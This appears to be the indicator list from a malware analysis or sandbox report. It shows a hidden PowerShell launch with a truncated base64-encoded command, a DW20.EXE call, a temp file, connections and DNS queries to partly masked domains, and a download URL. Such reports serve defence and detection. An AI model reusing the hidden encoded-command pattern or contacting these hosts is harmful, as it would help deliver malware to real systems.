Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABBAHkAYwBiAHUAbQBpAGMAcQBoAD0AJwBEAHEAZwB0AHIAbQBxAHMAJwA7ACQATQBkAHcAZgBmAHAAZQBkAHoAIAA9ACAAJwA3ADMAOQAnADsAJABQAHEAbwB3AHEAawBwAHMAeABnAGkAeQB1AD0AJwBYAG8...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\954476.cvr
- 'sh####travels.com':80
- 'sh####travels.com':443
- 'pk#.goog':80
- 'cs####curezza.com':443
- 'ic#####cketainment.com':443
- http://www.sh####travels.com/vvufz/wzr6/
- http://pk#.goog/gsr1/gsr1.crt
- 'sh####travels.com':443
- 'cs####curezza.com':443
- DNS ASK me####angpagi.com
- DNS ASK sh####travels.com
- DNS ASK pk#.goog
- DNS ASK su###saroma.net
- DNS ASK cs####curezza.com
- DNS ASK ic#####cketainment.com